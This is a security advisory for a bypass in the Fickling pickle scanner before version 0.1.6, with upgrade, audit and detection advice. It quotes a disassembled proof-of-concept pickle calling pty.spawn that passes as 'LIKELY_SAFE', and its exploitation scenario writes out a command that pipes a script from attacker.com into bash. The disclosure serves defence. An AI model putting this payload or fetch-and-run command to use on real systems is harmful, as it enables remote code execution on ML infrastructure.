If your ML pipeline uses Fickling to validate pickle files before loading models, your security gate has been bypassable since before the fix in 0.1.6. A crafted pickle embedding pty.spawn() with a single appended BUILD opcode passes Fickling's checks as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately and treat any model files previously cleared by older versions from untrusted sources as unvetted.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | < 0.1.6 | 0.1.6 |
Do you use fickling? You're affected.
Severity & Risk
Recommended Action
- 1. Upgrade fickling to >= 0.1.6 immediately — this release patches both the pty blocklist gap (missing from unsafe module imports) and the BUILD opcode bypass of the unused-variable heuristic. 2. Audit all pickle files validated by fickling < 0.1.6 from untrusted sources since last upgrade — treat them as unverified and re-scan. 3. Add defense-in-depth: sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's torch.load() with weights_only=True where feasible; enforce allowlist-only module imports at the deserializer level. 4. Detection: grep fickling scan logs for LIKELY_SAFE verdicts on files containing pty, spawn references, or BUILD opcodes immediately following a REDUCE — these are indicators of the bypass pattern. 5. Consider supplementing Fickling with static binary analysis of pickle streams independent of heuristic-based tools.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Fickling Assessment Based on the test case provided in the original report below, this bypass was caused by `pty` missing from our block list of unsafe module imports (as previously documented in #108), rather than the unused variable heuristic. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in https://github.com/trailofbits/fickling/pull/187. ## Original report ### Summary An unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the "unused variable" heuristic, enabling arbitrary code execution. This bypass is achieved by adding a trivial operation to the pickle file that "uses" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe. ### Details Fickling relies on the heuristic of detecting unused variables in the VM's stack after execution. Opcodes like `REDUCE`, `OBJ`, and `INST`, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files. This vulnerability enables a bypass by modifying the pickle file to use this leftover variable. A simple way to achieve this is to add a `BUILD` opcode that, in effect, adds a `__setstate__` to the unused variable. This makes Fickling consider the variable "used," thus failing to flag the malicious file. ### PoC The following is a disassembled view of a malicious pickle file that bypasses Fickling's "unused variable" detection: ``` 0: \x80 PROTO 4 2: \x95 FRAME 26 11: \x8c SHORT_BINUNICODE 'pty' 16: \x94 MEMOIZE (as 0) 17: \x8c SHORT_BINUNICODE 'spawn' 24: \x94 MEMOIZE (as 1) 25: \x93 STACK_GLOBAL 26: \x94 MEMOIZE (as 2) 27: \x8c SHORT_BINUNICODE 'id' 31: \x94 MEMOIZE (as 3) 32: \x85 TUPLE1 33: \x94 MEMOIZE (as 4) 34: R REDUCE 35: \x94 MEMOIZE (as 5) 36: \x8c SHORT_BINUNICODE 'gottem' 44: \x94 MEMOIZE (as 6) 45: b BUILD 46: . STOP ``` Here, the additions to the original pickle file can see on lines 35, 36, 44 and 45. When analyzing this modified file, Fickling fails to identify it as malicious and reports it as **"LIKELY_SAFE"** as seen here: ``` { "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} } ``` ### Impact This allows an attacker to craft a malicious pickle file that can bypass fickling since it relies on the "unused variable" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
Exploitation Scenario
An attacker targeting an organization's model ingestion pipeline confirms via job postings or GitHub that the org uses Fickling to screen models. They craft a malicious .pkl file that embeds pty.spawn('/bin/bash', ['/bin/bash', '-c', 'curl attacker.com/implant.sh | bash']) via a REDUCE opcode, then append a BUILD opcode with a dummy value to 'use' the leftover stack variable, neutralizing Fickling's unused-variable heuristic. The file is submitted to the org's internal model registry or a shared community hub the org pulls from. An automated pipeline or data scientist downloads and loads the model — triggering arbitrary code execution on the ML training server or serving container — achieving a foothold for lateral movement into broader ML infrastructure, data stores, or secrets managers.